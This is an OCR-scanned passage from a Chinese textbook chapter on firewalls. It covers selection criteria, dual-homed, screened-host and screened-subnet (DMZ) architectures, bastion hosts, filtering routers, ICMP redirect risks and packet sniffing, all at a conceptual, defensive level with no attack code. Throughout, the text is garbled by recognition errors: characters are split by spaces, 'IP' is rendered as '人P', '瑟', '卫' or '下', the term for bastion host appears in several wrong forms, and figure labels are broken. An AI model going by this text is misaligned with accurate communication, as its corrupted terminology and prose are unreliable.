外 ， 设 定 工作 困难 、 必 须 具备 完整 的 知识 以 及 不 易 出 错 等 管理 问题 ， 更 是 一 般 企 业 不 愿意 
使 用 的 主要 原因 。 

2) ”防火 墙 自身 的 安全 性 

大 多 数 人 在 选择 防火 墙 时 都 将 注意 力 放 在 防火 墙 如 何 控制 连接 以 及 防火 墙 支持 多 少 种 
服务 ， 但 往往 忽略 一 点 ， 防 火 墙 也 是 网 络 上 的 主机 之 一 ， 也 可 能 存在 安全 问题 ， 防 火 墙 如 
果 不 能 确保 自身 安全 ， 则 防火 墙 的 控制 功能 再 强 ， 也 终究 不 能 完全 保护 内 部 网 络 。 

大 部 分 防火 墙 都 安装 在 一 般 的 操作 系统 上 ， 如 Unix、NT 系统 等 。 在 防火 墙 主机 上 执 
行 的 除了 防火 墙 软件 外 ， 所 有 的 程序 、 系 统 核心 ， 也 大 多 来 自 于 操作 系统 本 身 的 原 有 程序 。 
当 防 火 墙 上 所 执行 的 软件 出 现 安全 漏洞 时 ， 防 火 墙 本 身 也 将 受到 威胁 。 此 时 ， 任 何 的 防火 
墙 控制 机 制 都 可 能 失效 ， 因 为 当 一 个 黑客 取得 了 防火 墙 上 的 控制 权 以 后 ， 黑 客 几 乎 可 为 所 
欲 为 地 修改 防火 墙 上 的 存 取 规 则 (Access Rule)， 进 而 侵入 更 多 的 系统 。 因 此 ， 防 火 墙 自身 仍 
应 有 相当 高 的 安全 保护 。 

3) NCSC 的 认证 标准 

我 们 常会 看 到 或 听 到 某 些 防火 墙 具有 A、B、C 级 等 安全 等 级 规范 。 安 全 等 级 规范 白 皮 
书 是 美国 国家 安全 局 (NSA) 的 国家 计算 机 安全 中 心 (NCSC) 颁 布 的 官方 标准 ， 它 将 一 个 计算 
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机 系统 可 接受 的 信任 程度 予以 分 级 ， 依 安全 性 由 高 至 低 划分 为 A、B、C、D 四 个 等 级 ， 这 
些 安全 等 级 不 是 线性 的 ， 而 是 以 指数 级 上 升 的 。 

4 最 好 能 弥补 其 他 操作 系统 之 不 足 

一 个 好 的 防火 墙 必须 是 建立 在 操作 系统 之 前 而 不 是 在 操作 系统 之 上 ， 所 以 操作 系统 有 
的 漏洞 可 能 并 不 会 影响 到 一 个 好 的 防火 墙 系统 所 提供 的 安全 性 ， 由 于 硬件 平台 的 普及 以 及 
执行 效率 的 因素 ， 大 部 分 企业 均 会 把 对 外 提供 各 种 服务 的 服务 器 分 散 至 许多 操作 平台 上 ， 
但 我 们 在 无 法 保证 所 有 主机 安全 的 情况 下 ， 选 择 防 火 墙 作为 整体 安全 的 保护 者 ， 这 正 说 明 
了 操作 系统 提供 了 B 级 或 是 C 级 的 安全 并 不 一 定 会 直接 对 整体 安全 造成 影响 ,因为 一 个 好 
的 防火 墙 必须 能 弥补 操作 系统 的 不 足 。 

5) ”能 否 为 使 用 者 提供 不 同 平台 的 选择 

由 于 防火 墙 并 非 完全 由 硬件 构成 ， 所 以 软件 (操作 系统 ) 所 提供 的 功能 以 及 执行 效率 一 
定 会 影响 到 整体 的 表现 ， 而 使 用 者 的 操作 意愿 及 熟悉 程度 也 是 必须 考虑 的 重点 。 因 此 一 个 
好 的 防火 墙 不 但 本 身 要 有 良好 的 执行 效率 ， 也 应 该 提供 多 平台 的 执行 方式 供 使 用 者 选择 ， 
毕竟 使 用 者 才 是 完全 的 控制 者 ， 应 该 选择 一 套 符 合 现 有 环境 需求 的 软件 ， 而 非 为 了 软件 的 
限制 而 改变 现 有 环境 。 

6) ”能 否 向 使 用 者 提供 完善 的 售后 服务 

由 于 有 新 的 产品 出 现 ， 那 么 就 有 人 会 研究 新 的 破解 方法 ， 所 以 一 个 好 的 防火 墙 提供 者 
必须 有 一 个 庞大 的 组 织 作为 使 用 者 的 安全 后 盾 ， 也 应 该 有 众多 的 使 用 者 所 建立 的 口碑 为 防 
火 墙 作 见 证 。 

7) ”应 该 考虑 企业 的 特殊 需求 

企业 安全 政策 中 往往 有 些 特殊 需求 不 是 每 一 个 防火 墙 都 会 提供 的 ， 这 方面 常常 成 为 选 
择 防火 墙 的 考虑 因素 之 一 ， 常 见 的 需求 如 下 。 

(1) IP 地 址 转换 (IP Address Translation)。 

进行 PP 地 址 转换 有 两 个 好 处 : 其 一 是 隐藏 内 部 网 络 真正 的 IP 地 址 ， 这 可 以 使 黑客 
(Hacker) 无 法 直接 攻击 内 部 网 络 , 这 也 是 要 强调 防火 墙 自身 安全 性 问题 的 主要 原因 ; 另 一 个 
好 处 是 可 以 让 内 部 使 用 保留 的 下 地 址 ， 这 对 许多 卫 地 址 不 足 的 企业 是 有 益 的 。 

(2) 双重 DNS。 

当 内 部 网 络 使 用 没有 注册 的 他 地 址 ， 或 是 防火 墙 进行 瑟 地 址 转换 时 ，DNS 也 必须 经 
过 转换 ， 因 为 ， 同 样 的 一 个 主机 在 内 部 的 人 P 地 址 与 给 予 外 界 的 人 P 地 址 将 会 不 同 ， 有 的 防 
火 墙 会 提供 双重 DNS， 有 的 则 必须 在 不 同 主机 上 各 安装 一 个 DNS。 

(3) 虚拟 企业 网 络 (VPN)。 

VPN 可 以 在 防火 墙 与 防火 墙 或 移动 的 Client 间 对 所 有 网 络 传输 的 内 容 加 密 ， 建 立 一 个 
虚拟 通道 ， 让 两 者 间 如 同 在 同一 网 络 上 ， 可 以 安全 且 不 受 拘束 地 互相 存 取 。 这 对 总 公司 与 
分 公司 之 间或 公司 与 外 出 的 员工 之 间 ， 需 要 直接 联系 ， 又 不 愿 花 费 大 量 金钱 另外 申请 专线 
或 用 长 途 电话 拨号 连接 时 ， 将 会 非常 有 用 。 

(4 扫 毒 功能 。 

大 部 分 防火 墙 都 可 以 与 防 病毒 防火 墙 搭配 实现 扫 毒 功能 ， 有 的 防火 墙 则 可 以 直接 集成 
扫 毒 功能 ， 差 别 只 是 扫 毒 工作 是 由 防火 墙 完成 ， 或 是 由 另 一 台 专 用 的 计算 机 完成 。 
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(5) 特殊 控制 需求 。 
有 时 候 企业 会 有 特别 的 控制 需求 ， 如 限制 特定 使 用 者 才能 发 送 E-mail， 限 制 同 时 上 网 
人 数 ， 限 制 使 用 时 间或 Block Java、ActiveX 等 ， 依 需求 不 同 而 定 。 


3. 提示 


防火 墙 是 企业 网 络 安全 问题 的 流行 方案 ， 即 把 公共 数据 和 服务 置 于 防火 墙 外 ， 使 其 对 
防火 墙 内 部 资源 的 访问 受到 限制 。 而 一 个 好 的 防火 墙 不 但 应 该 具备 包括 检查 、 认 证 、 和 警告 、 
记录 的 功能 ， 并 且 能 够 为 使 用 者 可 能 遇 到 的 困境 ， 事 先 提出 解决 方案 ,如 人 P 地 址 不 足 形成 
的 下 地 址 转换 的 问题 信息 加 密 /解密 的 问题 ， 大 企业 要 求 能 够 透 过 Intemet 集中 管理 的 问 
题 等 ， 是 选择 防火 墙 时 必须 考虑 的 重点 。 


7.3 ”防火 墙 的 体系 结构 


鉴于 网 络 结构 的 多 样 性 ， 不 同 站 点 的 安全 要 求 也 不 尽 相同 ， 所 以 目前 防火 墙 设计 标准 
还 无 法 统一 。 在 应 用 过 程 中 应 根据 实际 情况 来 完成 对 防火 墙 的 体系 结构 的 设计 。 下 面 介绍 
几 种 常见 的 防火 墙 体系 结构 。 


7.3.1 双 宿 /多 宿主 机 模式 


双 宿 /多 宿主 机 防火 墙 是 一 种 拥有 两 个 或 多 个 连接 到 不 同 网 络 的 网 络 接口 的 防火 墙 ， 通 
常 是 一 台 装 有 两 块 或 多 块 网 卡 的 堡垒 主机 ， 两 块 或 多 块 网 卡 各 自 与 受 保护 网 络 和 外 部 网 络 
相连 。 由 于 集 参 主机 具有 两 个 以 上 的 网 卡 ， 可 以 连接 两 个 以 上 的 网 络 ， 所 以 计算 机 系统 可 
以 充当 这 些 网 络 之 间 的 防火 墙 , 从 一 个 网 络 到 另 一 个 网 络 发 送 的 瑟 数据 包 必须 经 过 双 宿 主 
机 的 检查 。 双 宿主 机 检查 通过 的 数据 包 ， 会 根据 安全 策略 进行 处 理 。 

双 宿 /多 宿主 机 模式 下 ， 保 又 主机 可 以 采用 包 过 滤 技 术 ， 也 可 以 采用 代理 服务 技术 。 在 
使 用 代理 服务 技术 的 双 宿 主机 中 ， 主 机 的 路 内 功能 通常 是 被 禁止 的 ， 两 个 网 络 之 间 的 通信 
通过 应 用 层 代理 服 务 来 完成 。 如 果 一 旦 黑客 侵入 集 垒 主机 并 使 其 具有 路 由 功能 ， 防 火 墙 将 
失去 作用 。 

多 宿主 机 (Multihomed Hosb 拥 有 多 个 网 络 接口 ， 每 一 个 接口 都 连 在 物理 上 和 逻辑 上 不 
分 离 的 不 同 的 网 段 上 。 国 内 已 经 有 防火 墙 可 以 支持 多 达 八 个 网 络 接口 。 每 个 不 同 的 网 络 接 
口 分 别 连接 不 同 的 子 网 ， 不 同 子 网 之 间 的 相互 访问 实施 不 同 访问 控制 策略 。 

下 面 主要 介绍 双 宿主 机 防火 墙 。 一 个 双 宿 主机 是 一 种 防火 墙 ， 拥 有 两 个 连接 到 不 同 网 
络 上 的 网 络 接口 。 例 如 ， 一 个 网 络 接口 连 到 外 部 的 不 可 信任 的 网 络 上 ， 另 一 个 网 络 接口 连 
接 到 内 部 的 可 信任 的 网 络 上 。 这 种 防火 墙 的 最 大 特点 是 人 P 层 的 通信 是 被 阻止 的 ， 两 个 网 络 
之 间 的 通信 可 通过 应 用 层 数据 共享 或 应 用 层 代理 服务 来 完成 。 一 般 情 况 下 ， 人 们 采用 代理 
服务 的 方法 ， 因 为 这 种 方法 为 用 户 提供 了 更 为 方便 的 访问 手段 。 

如 图 7-1 所 示 是 通过 应 用 层 数 据 共享 来 实现 对 外 网 的 访问 的 示意 图 。 
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图 7-1 应 用 层 数据 共享 


双 宿 主机 防火 墙 的 另 一 种 方式 是 接受 用 户 的 登录 ， 然 后 再 去 访问 其 他 主机 。 这 种 方式 
要 求 在 双 宿 主机 上 开通 一 些 用 户 账号 ， 这 样 会 非常 危险 。 因 为 用 户 账号 相对 来 说 容易 被 破 
解 ， 同 时 也 提供 了 一 条 黑客 入 侵 的 通道 。 

双 宿 主机 防火 墙 还 可 以 通过 提供 代理 服务 来 实现 ， 代 理 服务 相对 来 说 比较 安全 。 在 双 
宿主 机 上 ， 运 行 各 种 各 样 的 代理 服务 器 ， 当 要 访问 外 部 站 点 时 ， 必 须 先 经 过 代理 服务 器 认 
证 ， 然 后 才 可 以 通过 代理 服务 器 访问 Internet。 代 理 服务 模式 如 图 7-2 所 示 。 


图 7-2 运行 代理 服务 器 的 双 宿主 机 


使 用 双 宿 主机 作为 防火 墙 ， 防 火 墙 本 身 的 安全 性 至 关 重要 。 现 在 出 现 的 新 型 双 宿主 机 
防火 墙 没 有 下 地 址 ， 被 称 为 透明 防火 墙 。 透 明 防 火 墙 自身 的 安全 性 就 比较 高 ， 因 为 在 没有 
了 全 地 址 的 情况 下 ， 黑 客 则 很 难 对 防火 墙 进行 攻击 。 

对 于 非 透明 防火 墙 ， 其 自身 的 安全 性 应 注意 以 下 几 个 方面 。 

首先 ， 要 禁止 网 络 层 的 路 由 功能 ， 否 则 数据 包 就 会 绕 过 代理 ， 防 火 墙 也 就 失效 了 ， 如 
图 7-3 所 示 表 示 了 双 宿 主机 的 路 由 功能 未 被 禁止 。 
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其 次 ， 双 宿主 机 应 具有 强大 的 身份 认证 系统 ， 才 可 以 阻挡 来 自 外 部 不 可 信和 网络 的 非法 
登录 。 对 防火 墙 自身 的 访问 要 么 通过 控制 台 ， 要 么 通过 远程 访问 。 通 过 控制 台 方 式 访问 防 
火 墙 很 难 做 到 友好 的 界面 。 因 此 现在 的 防火 墙 大 多 是 通过 控制 台 设置 一 些 简单 的 参数 ， 其 
他 安全 设置 主要 是 通过 专用 的 程序 或 通过 Web 方式 来 设置 。 为 了 保证 防火 墙 的 安全 性 . 建 
议 在 双 宿主 机 防火 墙 上 增加 一 个 网 络 接口 , 设置 只 有 通过 第 三 个 网 络 接口 才能 访问 防火 墙 。 

双 宿 主机 防火 墙 还 应 尽量 减少 一 些 不 必要 的 服务 ， 任 何 一 种 服务 都 会 存在 被 入 侵 的 可 
能 。 此 外 还 要 删除 一 些 不 必要 的 协议 ， 最 好 只 保留 TCP/IP 协议 。 


7.3.2 ”屏蔽 主机 模式 


屏蔽 主机 防火 墙 由 包 过 滤 路 由 器 和 堡 至 主机 组 成 。 在 这 种 方式 的 防火 墙 中 ， 堡 侄 主 机 
安装 在 内 部 网 络 上 ， 通 常 在 路 由 器 上 设立 过 滤 规 则 ， 并 使 这 个 堡垒 主机 成 为 从 外 部 网 络 唯 
一 可 直接 到 达 的 主机 ， 这 确保 了 内 部 网 络 不 受 未 被 授权 的 外 部 用 户 的 攻击 。 屏 蔽 主机 防火 
墙 实现 了 网 络 层 和 应 用 层 的 安全 ， 因 而 比 单独 的 包 过 滤 或 应 用 网 关 代 理 更 安全 。 

这 种 防火 墙 强迫 所 有 的 外 部 主机 与 一 个 堡垒 主机 相连 接 ， 而 不 让 它们 直接 与 内 部 主机 
相连 。 为 了 实现 这 个 目的 ， 专 门 设置 了 一 个 过 滤 路 由 器 ， 通 过 它 ， 把 所 有 外 部 到 内 部 的 连 
接 都 路 由 到 了 堡 拿 主 机 上 。 图 7-4 就 显示 了 屏蔽 主机 防火 墙 的 结构 。 

在 这 种 体系 结构 中 , 堡垒 主机 位 于 内 部 网 络 中 屏蔽 路 由 器 连接 Intemet 和 内 部 网 , 它 是 
防火 墙 的 第 一 道 防 线 。 屏 蔽 路 由 器 需要 进行 适当 的 配置 ， 使 所 有 的 外 部 连接 被 路 由 到 堡垒 
主机 上 。 并 不 是 所 有 服务 的 入 站 连接 都 会 被 路 由 到 堡 倒 主机 上 ， 屏 项 路 由 器 可 以 根据 安全 
策略 允许 或 禁止 某 种 服务 的 入 站 连接 (外 部 到 内 部 的 主动 连接 )。 

对 于 出 站 连接 (内 部 网 络 到 外 部 不 可 信和 网络 的 主动 连接 )， 可 以 采用 不 同 的 策略 。 对 于 
一 些 服务 ， 如 Telnet， 可 以 允许 它 直 接 通过 屏蔽 路 由 器 连接 到 外 部 网 而 不 通过 堡 又 主机; 
其 他 服务 ， 如 WWW 和 SMTP 等 ， 必 须 经 过 堡垒 主机 才能 连接 到 Internet， 并 在 堡 倒 主机 
上 运行 该 服务 的 代理 服务 器 。 怎 样 安排 这 些 服 务 取 决 于 安全 策略 。 
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7-4 屏蔽 主机 体系 结构 


这 个 防火 墙 系统 提供 的 安全 等 级 比 包 过 滤 防 火 墙 系统 要 高 ， 因 为 它 实现 网 络 层 安全 ( 包 
过 滤 ) 和 应 用 层 安全 (代理 服务 )。 所 以 入 侵 者 在 破坏 内 部 网 络 的 安全 性 之 前 ， 必 须 首先 渗透 
两 种 不 同 的 安全 系统 。 

即使 入 侵 者 进入 了 内 部 网 络 ， 也 必须 和 堡垒 主机 相 竞 争 ， 而 堡垒 主机 是 一 台 安 全 性 很 
高 的 主机 ， 主 机 上 没有 任何 入 侵 者 可 以 利用 的 工具 ， 不 能 作为 黑客 进一步 入 侵 的 基地 。 堡 
侈 主机 在 应 用 层 对 客户 的 请 求 做 判断 ， 允 许 或 禁止 某 种 服务 。 如 果 该 请 求 被 允许 ， 堡 侄 主 
机 就 把 数据 包 发 送 到 某 一 内 部 主机 或 屏蔽 路 由 器 上 ， 否 则 抛弃 数据 包 ， 其 过 程 如 图 7-5 所 
示 。 集 又 主机 上 一 般 安 装 的 是 代理 服务 器 程序 ， 即 外 部 网 访问 内 部 网 的 时 候 ， 首 先 经 过 了 


NII ED 
外 部 路 由 器 的 过 滤 ， 然 后 通过 代理 服务 器 代理 后 才能 进入 内 部 网 。 


过 滤 路 由 器 内 部 堡垒 主机 


7-5 ”堡垒 主机 转发 数据 包 


过 滤 路 由 器 是 否 正确 配置 是 这 种 防火 墙 安全 与 否 的 关键 ， 过 滤 路 由 器 的 路 由 表 应 当 受 
到 严格 的 保护 ， 否 则 如 果 路 由 表 遭 到 破坏 ， 则 数据 包 就 不 会 被 路 由 到 堡垒 主机 上 ， 使 保健 
主机 被 越过 。 

路 由 表 是 怎么 被 入 侵 者 破坏 的 呢 ? 用 什么 办 法 可 以 阻止 这 种 破坏 活动 呢 ? 在 ICMP 的 
消息 中 有 一 种 重 定向 消息 ， 这 种 消息 用 来 帮助 主机 建立 一 个 更 好 的 路 由 表 。 一 般 情 况 下 ， 
这 种 消息 是 由 路 由 器 发 给 主机 的 ， 其 过 程 如 图 7-6 所 示 。 

(1) 假定 主机 发 送 瑟 包 到 R1， 这 种 路 径 选 择 一 般 是 默认 路 径 。 

(2) Rl 收 到 IP 包 ， 寻 找 其 路 由 表 ， 发 现 R2 是 一 条 正确 的 路 径 ， 于 是 把 数据 包 发 往 
R2。 在 这 时 ，R1 会 发 现 数据 包 被 从 与 进入 时 相同 的 网 络 接口 发 送出 去 ， 这 样 Rl 就 会 发 现 
数据 包 发 往 Rl 不 是 一 个 好 的 路 径 ， 于 是 R1 就 要 向 主机 发 送 一 个 重 定向 信息 包 。 


(D IP 数据 包 | 
(2) IP 数据 包 [rz] 


图 7-6 重 定向 消息 

(3) Rl 向 主机 发 送 一 个 重 定向 信息 包 ， 告 诉 主机 今后 把 数据 包 直接 发 往 R2， 而 不 经 
过 R1。 

这 样 ， 如 果 过 滤 路 由 器 对 重 定向 消息 做 出 应 答 ， 就 会 受到 入 侵 者 所 发 的 错误 的 ICMP 
消息 包 的 攻击 ， 因 此 ICMP 重 定向 消息 的 应 答 必 须 禁 止 。 那 么 通过 什么 来 确定 过 滤 路 由 器 
的 路 由 表 呢 ? 可 以 用 Route 命令 建立 静态 的 路 由 表 ， 以 这 种 方法 建立 的 路 由 表 不 会 被 路 由 
协议 终止 和 改变 ， 这 就 保护 了 静态 路 由 表 不 受 错误 的 路 由 报告 的 影响 。 同 时 ， 还 需要 禁止 
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过 滤 路 由 器 的 路 由 协议 守护 进程 运行 ， 以 保证 路 由 不 会 传播 到 外 部 世界 。 
7.3.3 ”屏蔽 子 网 模式 


屏蔽 子 网 防火 墙 采用 两 个 包 过 滤 路 由 器 和 一 个 堡垒 主机 ， 在 内 、 外 网 络 之 间 建 立 了 一 
个 被 隔离 的 子 网 ， 定 义 为 “ 非 军 事 区 ”网 络 ， 有 时 也 称 作 周边 网 。 网 络 管理 员 将 堡垒 主机 、 
Web 服务 器 、Mail 服务 器 等 公用 服务 器 放 在 非 军事 区 网 络 中 。 内 部 网 络 和 外 部 网 络 均 可 访 
问 屏蔽 子 网 ， 但 禁止 它们 穿 过 屏蔽 子 网 通信 。 在 这 一 配置 中 ， 即 使 堡垒 主机 被 入 侵 者 控制 ， 
内 部 网 络 仍 受 到 内 部 过 滤 路 由 器 的 保护 。 
屏蔽 子 网 (Screened SubNeb 在 本 质 上 和 屏蔽 主机 是 一 样 的 ， 但 是 增加 了 一 层 保 护 体 
系 一 一 周边 网 络 ， 堡 又 主机 位 于 周边 网 络 上 , 周边 网 络 和 内 部 网 络 被 内 部 屏蔽 路 由 器 分 开 ， 
其 结构 示意 图 如 图 7-7 所 示 。 


图 7-7 屏蔽 子 网 体系 结构 


为 什么 要 加 一 个 周边 网 络 呢 ? 这 样 设计 又 有 什么 好 处 呢 ? 在 前 面 提 到 过 当 堡 又 主机 被 
入 侵 者 控制 后 ， 整 个 内 部 网 络 就 处 在 危险 之 中 。 堡 又 主机 是 最 容易 受 侵袭 的 ， 虽 然 堡垒 主 
机 很 坚固 ， 不 易 被 入 侵 者 控制 ， 但 万 一 堡垒 主机 被 控制 ， 如 果 采 用 了 屏蔽 子 网 体系 结构 ， 
入 侵 者 仍然 不 能 直接 侵袭 内 部 网 络 ， 内 部 网 络 仍 受到 内 部 屏蔽 路 由 器 的 保护 ， 就 更 加 安 
全 了 。 

1. 周边 网 络 

周边 网 络 也 称 为 “停火 区 ”或 者 “ 非 军事 区 ”(DMZ)， 周 边 网 络 用 了 两 个 包 过 滤 路 由 
器 和 一 个 堡垒 主机 。 这 是 最 安全 的 防火 墙 系统 ， 因 为 在 定义 了 “停火 区 ”网 络 后 ， 它 支持 
网 络 层 和 应 用 层 安 全 功能 。 网 络 管理 员 将 堡垒 主机 、 信 息 服务 器 、Modem 组 以 及 其 他 公用 
服务 器 放 在 DMZ 网 络 中 。DMZ 网 络 很 小 ， 处 于 Internet 和 内 部 网 络 之 间 ， 在 一 般 情 况 下 ， 
对 DMZ 配置 成 使 用 Intemet 和 内 部 网 络 系统 能 够 访问 DMZ 网 络 上 数目 有 限 的 系统 ， 而 通 
过 DMZ 网 络 直接 进行 信息 传输 是 被 严格 禁止 的 。 

周边 网 络 是 一 个 防护 层 ， 它 就 像 电视 上 军事 基地 的 层 层 铁 门 一 样 ， 即 使 攻破 了 一 道 铁 
门 ， 还 有 另 一 道 铁 门 。 在 周边 网 络 上 ， 可 以 放置 服务 器 ， 如 WWW 和 FTP 服务器， 以 便于 
公众 的 访问 。 这 些 服务 器 可 能 会 受到 攻击 ， 因 为 它们 是 牺牲 主机 ， 但 内 部 网 络 还 是 被 保护 
着 的 。 
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下 面 来 讲 周边 网 络 的 作用 。 现 在 大 部 分 的 局 域 网 采用 以 太 网 ， 以 太 网 的 特点 就 是 广播 
式 的 ,这样 一 台 位 于 网 络 上 的 机 器 可 以 监听 网 上 所 有 的 通信 。 实 现 这 个 目的 是 极为 简单 的 ， 
一 般 情 况 下 ， 网 络 接口 只 接收 发 向 自己 的 数据 包 。 如 果 网 络 接口 被 置 成 混合 模式 ， 则 该 网 
络 接口 可 以 接收 任何 数据 包 ， 其 他 网 络 技术 令 牌 环 网 和 FDDI 网 也 是 如 此 。 试 想 ， 如 果 没 
有 周边 网 络 , 那么 入 侵 者 控制 了 堡垒 主机 后 就 可 以 监听 整个 内 部 网 络 的 对 话 。 当 使 用 Telnet 
和 FTP 时 , 入 侵 者 可 以 很 容易 用 Sniffer 嗅 探 到 使 用 者 的 账号 和 口令 。 即 使 口令 没有 被 攻破 ， 
探听 者 仍然 可 以 阅读 和 访问 他 人 的 敏感 文件 ， 或 偷 阅 他 人 的 E-mail 邮件 。 

如 果 把 堡垒 主机 放 在 周边 网 络 上 ， 即 使 入 侵 者 控制 了 堡垒 主机 ， 他 所 能 侦 听 到 的 内 容 
也 是 有 限 的 ， 只 有 Intemet 和 堡垒 主机 、 内 部 主机 和 堡垒 主机 间 的 会 话 ， 内 部 网 络 主机 之 间 
的 通信 仍然 是 安全 的 。 因 为 内 部 网 络 上 的 数据 包 虽 然 在 内 部 网 上 是 广播 式 的 ， 但 内 部 过 滤 
路 由 器 会 阻止 这 些 数据 包 流 入 周边 网 络 (当然 ， 发 往 周边 网 络 和 Intemet 的 数据 包 除外 ， 在 
这 种 情况 下 ， 内 部 过 滤 路 由 器 会 转发 这 些 数据 包 到 周边 网 络 )。 不 仅 如 此 ， 内 部 过 滤 路 由 器 
还 可 以 阻挡 内 部 网 上 的 广播 信息 ， 这 样 入 侵 者 即使 控制 了 堡垒 主机 也 很 难得 到 关于 内 部 网 
的 信息 。 


2. 堡垒 主机 


在 屏蔽 的 子 网 体系 结构 中 ， 堡 垒 主机 被 放置 在 周边 网 络 上 ， 它 可 以 被 认为 是 应 用 层 网 
关 ， 是 这 种 防御 体系 的 核心 。 在 堡垒 主机 上 ， 可 以 运行 各 种 各 样 的 代理 服务 器 。 

(1) 在 堡垒 主机 上 运行 电子 邮件 代理 服务 器 ， 代 理 服务 器 把 入 站 的 E-mail 转发 到 内 部 
网 的 邮件 服务 器 上 。 

(2) 在 煲 垒 主机 上 运行 WWW 代理 服务 器 ， 内 部 网 络 的 用 户 可 以 通过 堡垒 主机 访问 
Intemet 上 的 WWW 服务 器 。 

(3) 在 堡垒 主机 上 运行 一 个 伪 DNS 服务 器 ， 回 答 Internet 上 主机 的 查询 。 

(4) 在 堡垒 主机 上 运行 FTP 代理 服务 器 ， 对 外 部 的 FTP 连接 进行 认证 ,并 转 接 到 内 部 
的 FTP 服务 器 上 。 

对 于 出 站 服务 ， 不 一 定 要 求 所 有 的 服务 都 经 过 堡垒 主机 代理 ， 一 些 服务 可 以 通过 内 部 
过 滤 路 由 器 和 Internet 直接 对 话 ， 但 对 于 入 站 服务 ， 应 要 求 所 有 的 服务 都 通过 堡垒 主机 。 


3. 内 部 路 由 器 


内 部 路 由 器 (又 称 阻塞 路 由 器 ) 位 于 内 部 网 和 周边 网 络 之 间 ， 用 于 保护 内 部 网 不 受 周边 
网 络 和 Internet 的 侵害 ， 它 执行 了 大 部 分 的 过 滤 工 作 。 

对 于 一 些 服 务 ， 如 出 站 的 Telnet， 可 以 允许 它 不 经 过 堡垒 主 机 而 只 经 过 内 部 过 滤 路 由 
器 。 在 这 种 情况 下 ， 内 部 过 滤 路 由 器 用 来 过 滤 数 据 包 。 内 部 过 滤 路 由 器 也 用 来 过 滤 内 部 网 
络 和 集 健 主机 之 间 的 数据 包 ， 这 样 做 是 为 了 防止 煲 垒 主机 被 攻占 。 若 不 对 内 部 网 络 和 堡垒 
主机 之 间 的 数据 包 加 以 控制 ， 当 入 侵 者 控制 了 煲 垒 主机 后 ， 就 可 以 不 受 限 制 地 访问 内 部 网 
络 上 的 任何 主机 ， 周 边 网 络 也 就 失去 了 意义 ， 在 实质 上 就 与 屏蔽 主机 结构 一 样 了 。 

在 实际 操作 中 ， 应 把 堡垒 主机 和 内 部 网 主机 之 间 的 通信 限制 到 实际 所 需要 的 程度 ， 即 
最 小 特权 原则 。 如 把 堡垒 主机 和 内 部 网 的 SMTP 通信 限制 在 堡垒 主机 的 SMTP 代理 和 内 部 
出 站 服务 器 之 间 ， 以 防止 入 侵 者 在 控制 堡垒 主机 后 ， 利 用 SMTP 对 内 部 网 络 进行 攻击 ， 入 
侵 者 可 以 用 堡 驹 主机 上 的 一 个 端口 和 内 部 主机 上 的 一 个 大 于 1023 的 端口 建立 连接 , 伪装 一 
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个 出 站 的 SMTP 连接 。 
4. 外 部 路 由 器 


外 部 路 由 器 的 一 个 主要 功能 是 保护 周边 网 络 上 的 主机 ， 但 这 种 保护 不 是 很 必要 的 ， 因 
为 这 主要 是 通过 煲 垒 主机 来 进行 安全 保护 的 ， 但 多 一 层 保护 也 并 无 害处 。 外 部 路 由 器 还 可 
以 把 入 站 的 数据 包 路 由 到 堡垒 主机 ， 外 部 路 由 器 一 般 与 内 部 路 由 器 应 用 相同 的 规则 。 

外 部 路 由 器 还 可 以 防止 部 分 他 欺骗 , 因为 内 部 路 由 器 分 辨 不 出 一 个 声称 从 周边 网 络 来 
的 数据 包 是 否 真 的 从 周边 网 络 来 ， 而 外 部 路 由 器 则 可 以 很 容易 分 辨 出 真 伪 。 


7.4 防火 墙 的 主要 应 用 


防火 墙 是 目前 网 络 安全 领域 应 用 范围 最 广泛 的 网 络 安全 技术 之 一 。 下 面 介绍 一 下 防火 
墙 的 主要 应 用 方法 。 


7.4.1 防火 墙 的 工作 模式 


防火 墙 就 是 一 种 过 滤 塞 ， 要 由 防火 墙 过 滤 的 就 是 承载 通信 数据 的 通信 包 。 

所 有 的 防火 墙 至 少 都 会 说 两 个 词 : Yes 或 者 No。 直 接 说 就 是 接受 或 者 拒绝 。 最 简单 的 
防火 墙 是 以 太 网 桥 ， 但 几乎 没有 人 会 认为 这 种 原始 防火 墙 有 用 。 大 多 数 防火 墙 采用 的 技术 
和 标准 可 谓 五 花 八 门 。 这 些 防火 墙 的 形式 多 种 多 样 : 有 的 取代 系统 上 已 经 装备 的 TCP/IP 协 
议 栈 ， 有 的 在 已 有 的 协议 栈 上 建立 自己 的 软件 模块 ， 有 的 干脆 就 是 独立 的 一 套 操作 系统 。 
还 有 一 些 应 用 型 的 防火 墙 只 对 特定 类 型 的 网 络 连接 提供 保护 (比如 SMTP 或 者 HTTP 
协议 等 )。 还 有 一 些 基于 硬件 的 防火 墙 产品 ， 其 实 应 该 归 入 安全 路 由 器 一 类 。 以 上 的 
产品 都 可 以 叫 作 防火 墙 ， 因 为 它们 的 工作 方式 都 是 一 样 的 : 分 析出 入 防火 墙 的 数据 
包 ， 决 定 放行 还 是 把 它们 扔 到 一 边 。 

所 有 的 防火 墙 都 具有 IP 地 址 过 滤 功 能 。 这 项 任务 要 检查 人 P 包头 ， 根 据 其 人 P 源 地 址 和 
目标 地 址 做 出 放行 /丢弃 决定 。 如 图 7-8 所 示 ， 两 个 网 段 之 间隔 了 一 个 防火 墙 ， 防 火 墙 的 一 
端 有 台 UNIX 主机 ， 另 一 边 的 网 段 则 摆 了 台 PC 客户 机 ， 这 就 是 防火 墙 的 瑟 地 址 过 滤 工 作 
原理 。 


IP 地 址 过 滤 


人 wan 
防火 墙 
| 


7-8 ”IP 地 址 过 滤 原 理 图 
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当 PC 客户 机 向 UNIX 计算 机 发 起 telnet 请 求 时 , PC 的 telnet 客户 程序 就 产生 一 个 TCP 
包 ， 并 把 它 传 给 本 地 的 协议 栈 准 备 发 送 。 接 下 来 ， 协 议 栈 将 这 个 TCP 包 “ 塞 ”到 一 个 人 P 
包 里 ， 然 后 通过 PC 的 TCP/IP 栈 所 定义 的 路 径 将 它 发 送 给 UNIX 计算 机 。 在 这 个 例子 里 ， 
这 个 人 P 包 必须 经 过 横 在 PC 和 UNIX 计算 机 中 的 防火 墙 才能 到 达 UNIX 计算 机 ， 如 图 7-9 
所 示 。 


防火 埔 阻 赛 通信 


UNIX 主 机 


防火 墙 阻塞 所 有 通过 
Pp 包 发 送 到 UNIX 主 机 
的 包 


Telnet 服 务 器 


对 UNIX 主 机 发 起 Telnet 请 求 
时 ， 会 产生 一 个 包 ， 这 个 包 
通过 IP 包 发 送 到 UNIX 主 机 


7-9 TCP/IP 数据 包 发 送 过 程 


